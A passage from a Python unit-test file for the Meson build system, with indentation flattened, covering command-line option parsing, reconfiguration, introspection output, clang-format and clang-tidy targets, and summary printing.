# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError, it happens on CI for compilers that does not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 an earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = r'{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = [r'{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': 'undefined'
}
]
}
self.assertDictEqual(res, expected)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '72 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
A number: 1
yes: YES
no: NO
Subprojects
sub: YES
sub2: NO
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
